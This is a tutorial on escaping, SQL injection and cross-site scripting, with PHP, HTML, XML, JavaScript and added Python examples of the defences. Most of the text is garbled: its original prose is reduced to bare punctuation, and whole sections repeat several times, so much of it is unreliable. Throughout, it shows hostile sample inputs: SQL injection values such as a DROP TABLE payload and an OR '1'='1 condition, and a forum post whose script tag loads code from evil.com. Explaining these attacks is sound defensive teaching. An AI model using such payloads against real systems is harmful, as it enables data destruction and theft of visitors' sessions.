, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
This is no longer valid XML. The parser reads the "<" in "x < n" as the start of a tag and gives up. Inside XML a literal "<" has to be written as "&lt;" and a literal ">" as "&gt;".
Replacing a character that means something to the language with a sequence the language reads back as that plain character is called escaping.
escape |iˈskāp| [no obj.] [...] [with obj.] [...] / [...] [with obj.] IT: cause (a subsequent character or characters) to be interpreted differently [...]
The word fits: the character escapes its special meaning. But as soon as such a rule exists, one question follows it around: "and what about the character the rule itself uses?"
In XML that character is the ampersand (&). If "<" is written as "&lt;", how do you write the literal text "&lt;"? The ampersand is escaped too, as "&amp;", so the literal "&lt;" becomes "&amp;lt;".
XML is one example of "strings within strings". Here is another, in JavaScript:
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
The variable contents holds a "string within a string": a text placed inside a JavaScript string literal. Put the other text in:
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
Works! "<" and ">" mean nothing to JavaScript. Now a quotation, say Plato, complete with his quotation marks?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
...and it breaks. The interpreter reads the second quotation mark as the end of the literal and has no idea what to do with the words after it. JavaScript has its own escape character, the backslash: a quotation mark preceded by "\" is a character in the string, not its end:
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
The "\" tells the interpreter that the next character is to be taken literally. And if the text itself contains a backslash? Then the backslash has to be escaped as well, as "\\". The same question as with the ampersand, isn't it?
Exactly the same!
Every language that carries text inside itself has rules like these. Each one decides which characters are special and how they are escaped, and a text that is to live inside that language must be escaped by that language's rules, or parts of it will be read as the language rather than as text. With HTML, for instance: a user's post is text, the page around it is HTML, and unless the post is escaped by HTML's rules, anything in it that looks like a tag is a tag. That is what "HTML escaping" means.
Now SQL. A SQL query is, again, just text:
SELECT phone_number FROM users WHERE name = 'Alex'
This text is sent to the database server, which parses and executes it. In PHP it is sent like this:
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
The name here is a constant, "Alex". A real application asks the user for a name and looks up that person's phone number, so the name comes from a form and the query is built around it:
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
Run it, type a name, get a phone number. It works!
Except for one thing. Look at $_POST['name']. It is text typed by the user, and it is pasted, verbatim, into the text of a SQL query. That is a "string within a string" again, and this time the user decides what is in it.
What does the query become for different inputs? Each input is followed by the query it produces:
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
The first is fine. The second already breaks: the apostrophe in Mc'Donalds closes the string literal early, what follows is not SQL, and the query fails. The third is far worse. Do you see it?
Look again at the query the third input produces. The database sees three things: a statement selecting the phone number of Joe, then a statement dropping the table users (the ' closed the literal, the ; ended the statement), then -- starting a comment that swallows the leftover quote.
This is SQL injection. It has been known for well over ten years and it is still everywhere, because the cause is nothing exotic: text was pasted into text without regard for the rules of the language the text was going into. (Strictly, PHP's mysql_query() sends one statement at a time and would reject the second one; that is no protection, since an input such as x' OR '1'='1 needs no second statement to make the query return every row in the table.)
Exactly the same problem as with the quotation mark in JavaScript!
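The walkthrough above, carried out in Python as an added example that is not part of the original article: the same query built by string concatenation and by a parameter, run against an in-memory SQLite database. The table, rows and phone numbers are constructed for the demonstration. The x' OR '1'='1 input is added here because this driver, like PHP's mysql_query(), refuses a second statement in the query text, while a single-statement payload sails through.

```python
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows (names and numbers are invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (name TEXT, phone_number TEXT);"
        "INSERT INTO users VALUES ('Alex', '555-0100');"
        "INSERT INTO users VALUES ('Mc''Donalds', '555-0101');"
        "INSERT INTO users VALUES ('Joe', '555-0102');"
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str):
    """The article's vulnerable pattern: the user's text is pasted into the query text.
    Returns the phone numbers found, or a string describing how the query failed."""
    query = f"SELECT phone_number FROM users WHERE name = '{name}'"
    try:
        return [phone for (phone,) in conn.execute(query)]
    except sqlite3.OperationalError as exc:
        # Mc'Donalds: the apostrophe closed the literal early and the rest is not SQL.
        return f"syntax error: {exc}"
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:
        # Joe'; DROP TABLE users; --  puts a second statement into the text.  sqlite3
        # refuses stacked statements (older Pythons raise Warning, newer ProgrammingError);
        # a driver that allows them would run the DROP.
        return f"refused: {exc}"


def lookup_safe(conn: sqlite3.Connection, name: str):
    """Prepared statement: the query text is fixed and the name travels as a parameter,
    so there is no string within a string and nothing to escape."""
    rows = conn.execute("SELECT phone_number FROM users WHERE name = ?", (name,))
    return [phone for (phone,) in rows]


# The article's three inputs plus a single-statement injection that needs no stacking.
INPUTS = ["Alex", "Mc'Donalds", "x' OR '1'='1", "Joe'; DROP TABLE users; --"]


def compare() -> dict:
    """Run every input through both versions; returns {input: (unsafe_result, safe_result)}."""
    conn = fresh_db()
    return {name: (lookup_unsafe(conn, name), lookup_safe(conn, name)) for name in INPUTS}


if __name__ == "__main__":
    for name, (unsafe, safe) in compare().items():
        print(f"{name!r:32} unsafe={unsafe!r}  safe={safe!r}")
```

The unsafe version returns every phone number in the table for the x' OR '1'='1 input and a syntax error for Mc'Donalds; the parameterized version returns exactly the row whose name equals the typed text, which for both attack inputs is no row at all.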
Next example: XSS. The same thing once more, with HTML as the outer language.
Suppose we run a forum. Users write posts, the server stores them and renders them on a page, and the template for one post looks like this:
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
With an ordinary post it comes out as intended:
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
Then Pascal posts a line about math:
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
...and the browser mangles it: the "<" in "x < n" is read as the start of a tag. Annoying, but harmless. Now what about this post?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
Do you see it? The post is pasted into the page as is, so every visitor's browser fetches http://evil.com/dangerous.js and runs it, with the same access to the page and to the visitor's session on this site as the site's own scripts have. That is cross-site scripting.
It is the same problem as with SQL: a user's string placed inside a string of another language, this time HTML, without escaping. So what do we do?
Forbid text? Ban the apostrophe and the angle bracket? Or remember what the problem actually is, a "string within a string", and escape!
SQL first. The name has to become a proper SQL string literal, escaped by MySQL's rules:
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
The same three inputs now produce these queries:
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string rewrites the characters that are special inside a MySQL string literal, the apostrophe among them, so Mc'Donalds is looked up correctly and the third input is just an odd name that matches nobody. (The mysql_* functions shown here were removed in PHP 7; mysqli_real_escape_string does the same job, and prepared statements, below, do it better.)
Now HTML. The same template, with the output escaped:
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars replaces the characters special to HTML (&, <, > and the quotation mark) with their entities. JackTR's post now reaches the browser as:
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>
The browser shows the script tag as text, exactly as the user typed it, and nothing runs. It is no longer HTML inside HTML; it is text inside HTML.
That is the whole rule: whenever a string is placed inside another string, escape it by the rules of the language the outer string is written in. Going into SQL, escape for SQL. Going into HTML, escape for HTML. Going into a JavaScript literal (or XML), escape for JavaScript (or XML). No exceptions.
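The rule above in Python, as an added example that is not part of the original article: the article's own texts (Pascal's line, Plato's quotation and JackTR's script tag) are placed into XML, HTML, a JavaScript literal and a SQL literal, each escaped by the outer language's rules. escape_with is a deliberately generic escaper written to show why the escape character must be rewritten first; the rule tables and the function names are constructed for the demonstration.

```python
import html
import json
from xml.sax.saxutils import escape as xml_escape

# Sample texts taken from the article's own examples.
PASCAL = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
PLATO = 'Plato is said to once have said "Lorem ipsum dolor sit amet".'
JACKTR = ('<script src="http://evil.com/dangerous.js" type="text/javascript" '
          'charset="utf-8"></script>')

# Escape tables (constructed for the example): character -> sequence the outer
# language reads back as that plain character.
XML_RULES = {"&": "&amp;", "<": "&lt;", ">": "&gt;"}
JS_RULES = {"\\": "\\\\", '"': '\\"', "\n": "\\n", "\r": "\\r"}


def escape_with(text: str, rules: dict, escape_char: str) -> str:
    """Generic escaper.  The escape character is rewritten FIRST: done last, it would
    turn the "&lt;" just produced for "<" into "&amp;lt;", i.e. escape it twice."""
    out = text.replace(escape_char, rules[escape_char])
    for ch, seq in rules.items():
        if ch != escape_char:
            out = out.replace(ch, seq)
    return out


def into_xml_element(tag: str, text: str) -> str:
    """Text inside an XML element.  The stdlib escaper applies exactly XML_RULES."""
    return f"<{tag}>{xml_escape(text)}</{tag}>"


def into_html_body(text: str) -> str:
    """A post body inside the article's <p class="body">, much as htmlspecialchars()
    emits it (html.escape also rewrites both quotes, which matters inside attributes)."""
    return f'<p class="body">{html.escape(text, quote=True)}</p>'


def into_js_literal(text: str) -> str:
    """A JavaScript string literal.  A JSON string is a valid JS literal, and json.dumps
    escapes the backslash, the quotation mark and (with ensure_ascii) U+2028/U+2029."""
    return f"var contents = {json.dumps(text)};"


def into_sql_literal(text: str) -> str:
    """A standard-SQL string literal: the quote is doubled.  MySQL also treats the
    backslash as special unless NO_BACKSLASH_ESCAPES is on, which is why its driver
    ships its own escaper; parameters sidestep the question altogether."""
    return "'" + text.replace("'", "''") + "'"


def render_everywhere(text: str) -> dict:
    """The same text, correctly escaped for each of the four outer languages."""
    return {
        "xml": into_xml_element("contents", text),
        "html": into_html_body(text),
        "js": into_js_literal(text),
        "sql": into_sql_literal(text),
    }


if __name__ == "__main__":
    for sample in (PASCAL, PLATO, JACKTR, "Mc'Donalds", "&lt;"):
        for lang, rendered in render_everywhere(sample).items():
            print(f"{lang:4} {rendered}")
```

Feeding the literal text "&lt;" through render_everywhere shows the ampersand question from the XML section in practice: XML and HTML turn it into "&amp;lt;", while the JavaScript and SQL literals leave it alone, because the ampersand means nothing to them.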
Three related measures are often confused with escaping, or with one another:
Validation
Validation checks that the input is what the application expects, and rejects it otherwise. If a field is supposed to hold a number, then "DROP TABLE users" is not a valid value and "42" is. Validation knows nothing about HTML or SQL; it is about the meaning of the data, so it neither replaces escaping nor is replaced by it.
Sanitization
Sanitization "cleans" the input: it removes or rewrites the parts that are not allowed. It makes sense where the user may legitimately submit a restricted subset of the language, for instance a few HTML tags inside a post. It is the hardest of the three to get right and is only worth doing where the application needs it.
Prepared SQL statements
The most reliable way to avoid SQL injection: the query text and the data are sent to the server separately, so the data never becomes part of the query text at all. With PDO:
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);
Nothing is escaped here, and nothing needs to be: there is no string within a string. The name is a parameter, not a piece of the query text.
The same idea turns up elsewhere (a DOM API builds an HTML document from nodes and text values rather than from strings, so there is nothing to escape there either). Where such a separation of code and data is available, prefer it; it removes the question instead of answering it. It is not available everywhere, though, and the general problem of "strings within strings" remains: whatever cannot be passed as a parameter, in SQL or HTML or anything else, must be escaped by the outer language's rules.
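The first two measures in Python, as an added example that is not from the article: a validator for a field that must hold a number, and a small allow-list sanitizer built on the standard library's HTMLParser for posts that may carry a few formatting tags. The allow-list, the field name and the sample posts are assumptions for the demonstration; a production sanitizer should be a maintained library, not this sketch.

```python
import html
import re
from html.parser import HTMLParser

# Assumed allow-list for the example: formatting tags only, and no attribute ever survives.
ALLOWED_TAGS = {"b", "i", "em", "strong"}


def validate_user_id(value: str) -> int:
    """Validation: the field is meant to hold a user id, so anything that is not a
    positive decimal integer is rejected.  "42" passes, "DROP TABLE users" does not."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", value):
        raise ValueError(f"not a user id: {value!r}")
    return int(value)


class PostSanitizer(HTMLParser):
    """Sanitization: rebuild the post from scratch.  Allowed tags are re-emitted without
    their attributes, text is HTML-escaped, and everything else is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:          # attrs (onclick=..., style=...) are discarded
            self.out.append(f"<{tag}>")
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:        # also close anything opened inside it
            while True:
                inner = self.open_tags.pop()
                self.out.append(f"</{inner}>")
                if inner == tag:
                    break

    def handle_data(self, data):
        # Text stays text: "<" becomes "&lt;", a decoded "&lt;" is re-encoded, etc.
        self.out.append(html.escape(data, quote=True))

    def close(self):
        super().close()
        while self.open_tags:            # a post may leave tags unclosed
            self.out.append(f"</{self.open_tags.pop()}>")


def sanitize_post(body: str) -> str:
    """Return the post body reduced to escaped text plus the allowed tags."""
    parser = PostSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print(validate_user_id("42"))
    print(sanitize_post('<b onclick="steal()">bold</b> and '
                        '<script src="http://evil.com/dangerous.js"></script>'))
    print(sanitize_post("Basic math tells us that if x < n and y > n, x cannot be larger than y."))
```

Note what the sanitizer does not do: it does not try to recognise "dangerous" input and strip it. It accepts a short list of things it understands and treats everything else as text, which is the only direction in which a sanitizer for a restricted subset of HTML stays tractable.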
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
